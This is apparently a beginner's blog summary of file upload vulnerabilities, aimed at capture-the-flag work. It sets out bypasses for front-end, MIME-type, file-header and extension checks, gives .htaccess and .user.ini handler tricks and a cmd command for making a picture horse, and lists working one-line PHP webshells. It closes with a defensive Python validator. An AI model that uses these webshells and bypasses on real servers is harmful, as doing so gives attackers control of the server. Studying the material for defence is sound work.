File upload vulnerability summary
2022-07-07 04:50:00 【-*Xiao Kai】
Catalog
File upload vulnerability summary
Front-end validation (client-side JavaScript verification)
Back-end verification (server-side validation)
Server-side MIME type validation (file content type detection)
Server-side file content verification - the file header
Server-side file extension verification
Note: these are a beginner's notes, use them with discretion!
Principle
During development, files uploaded by users are not strictly checked and filtered, so a user can upload an executable script file (a malicious file) and, as a result, commands can be executed on the server.
Harm
Take control of the server
Upload a file with the same name to overwrite an existing file
Exposure to directory traversal
Denial of service (DoS) attacks, etc.
Webshell (web Trojan file)
The most common use of a file upload vulnerability is to upload a website Trojan (webshell). A webshell, also called a web Trojan file, is classified by development language as an ASP Trojan, PHP Trojan, JSP Trojan and so on. Such a Trojan uses the scripting language's command execution and file read/write functions; once it is uploaded to the server and parsed by the script engine, the attacker can control the server.
Webshells are divided into big horses (大马), small horses (小马, one-line Trojans) and picture horses (图片马).
Big horse
Full-featured, but with a large and relatively complex amount of code; not easy to hide, so encryption or similar means are usually needed to conceal it.
Small horse
Simple functions, little code, strong concealment.
Picture horse
Used when the site only allows image uploads (.png .jpg .gif) and the check cannot be bypassed.
Making a picture horse: in cmd, run copy picture.jpg /b + trojan.php /a picture.jpg
Front-end validation (client-side JavaScript verification)
Mainly checks the file suffix, roughly divided into:
Blacklist: file types that are not allowed to be uploaded
Whitelist: file types that are allowed to be uploaded
When the restriction on uploads exists only on the front end, the page code can simply be modified.
e.g. lay-data="{url: 'upload.php', accept: 'images', exts: 'png'}" changed to: lay-data="{url: 'upload.php', accept: 'file'}"
Front-end validation bypasses
Turn off JavaScript in the browser settings
Intercept the request with Burp Suite and modify it (for example, upload a 1.jpg file first, then intercept the request and change the name to 1.php)
Back-end verification (server-side validation)
Server-side MIME type validation (file content type detection)
A MIME type is the Internet standard for describing the content type of a message.
Mainly checks Content-Type:
When the restriction is only on the declared content type of the file, a Content-Type: application/octet-stream and the like can be changed to:
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
Server-side file content verification - the file header
The back end inspects the content of the uploaded file.
Image format checking examines the binary bytes at the start of the file; different image types have different file headers.
Bypass methods:
1. Prepend a file magic header to the file so that it passes as image content.
Common file magic headers: GIF89a
JPG: FF D8 FF E0 00 10 4A 46 49 46
GIF: 47 49 46 38 39 61 (GIF89a)
PNG: 89 50 4E 47
2. Because the server parses the Trojan file as an image, a request for the file only returns this "image", and the commands inside it are not executed.
Therefore a file inclusion vulnerability is exploited to have the image-format file parsed and executed as PHP:
.php?filename=uploads/1.jpg&pass=system('cat /flag')
Server-side file extension verification
The back end filters the file extension: the suffixes of uploaded files are filtered.
Bypass methods:
Suffix case variation
Equivalent suffix substitution
php: php, phtml, php3, php4, php5
jsp: jap, jspx, jspf
asp: asa, cer, aspx
ext: exee
Double-writing bypass: php -> phphpp
Commonly used
.htaccess
Reference: original text: Delve into the security problems caused by users tampering with the .htaccess configuration _ Hetian Wangan College - CSDN Blog
The .htaccess file (or "distributed configuration file"), in full Hypertext Access, provides a way to change configuration per directory: a file containing one or more directives is placed in a particular document directory and applies to that directory and all of its subdirectories. The directives available to users are limited; administrators set them with Apache's AllowOverride directive. In short, .htaccess is a configuration file of the Apache server that is only responsible for the configuration of web pages under the relevant directory.
Functions of the .htaccess file:
Web page 301 redirects
Custom 404 error pages
Changing how file extensions are handled
Disabling directory listings, etc.
So the following can be written into the .htaccess file:
<FilesMatch "s1mple">
    # parse files whose name contains s1mple as PHP
    SetHandler application/x-httpd-php
</FilesMatch>
or:
# parse .jpg files as PHP
AddType application/x-httpd-php .jpg
.user.ini
Reference: File upload .htaccess and .user.ini _ m0_46587008's blog - CSDN Blog
.user.ini is more widely applicable than .htaccess: whether the server is nginx, Apache or IIS, as long as PHP runs under FastCGI this method can be used.
Function of the .user.ini file: it can change how the user's files are read and included, so it applies more widely, but with one more (and important) condition: there must be an executable PHP file in the corresponding directory. Next, look at how to construct these two configuration files.
auto_prepend_file=a.jpg  ; include the Trojan before the script
auto_append_file=a.jpg   ; include the Trojan after the script
Common one-line Trojans:
<?php @eval($_POST["pass"]);?>
<script language='php'>assert($_REQUEST['pass'])</script>
<script language="php">eval($_POST['pass'])</script>
<script language="php">eval($_REQUEST['pass'])</script>
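A server-side validator that enforces every check discussed above at once (extension allowlist with case folding and a single-extension rule, Content-Type agreement, file header matching the declared extension, a scan for embedded PHP tags in the "picture horse" case, and rejection of .htaccess/.user.ini names), written here as an added Python example; it is not the blog's code, and the function name, the random renaming scheme and the assumption that uploads are stored outside the web root are mine.

```python
"""Server-side upload validator covering the checks discussed on this page."""
import os
import re
import secrets

# Allowlist: canonical extension -> (required Content-Type, accepted magic bytes).
# An allowlist beats a blacklist: phtml/php3/PhP/phphpp never need enumerating.
ALLOWED = {
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
}
# Names the web server or PHP-FPM reads as configuration; never store them.
CONFIG_NAMES = {".htaccess", ".user.ini"}
# Script markers a genuine image never contains (catches "picture horses"
# that merely prepend a GIF89a/JFIF header to PHP code).
SCRIPT_RE = re.compile(rb"<\?php|<\?=|<script[^>]*language=[\"']?php", re.I)


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return (True, server_generated_name) or (False, rejection_reason)."""
    # Strip any client-supplied path; Windows clients may send backslashes.
    base = os.path.basename(filename.replace("\\", "/"))
    if base.lower() in CONFIG_NAMES or base.startswith("."):
        return False, "configuration or dot file name rejected"
    parts = base.lower().split(".")
    # Exactly one extension: rejects a.php.jpg, a.jpg. and trailing-dot tricks.
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "exactly one extension required"
    ext = parts[1]  # already lower-cased, so 1.PhP and 1.JPG are handled uniformly
    if ext not in ALLOWED:
        return False, f"extension .{ext} not in allowlist"
    mime, magics = ALLOWED[ext]
    # The declared Content-Type is client-controlled; require it to agree anyway.
    if content_type.split(";")[0].strip().lower() != mime:
        return False, "Content-Type does not match extension"
    # The header must match *this* extension, not merely be some image header.
    if not any(data.startswith(m) for m in magics):
        return False, "file header does not match extension"
    if SCRIPT_RE.search(data):
        return False, "embedded script tag found"
    # Discard the client name entirely: a random name defeats overwrite and
    # guessable-path issues. Store outside the web root with execution disabled
    # (assumed deployment), so an .htaccess/.user.ini handler trick has no target.
    return True, f"{secrets.token_hex(16)}.{ext}"
```

The header and tag scans are heuristics; re-encoding the image through an image library before storing it is the stronger control when the application can afford it.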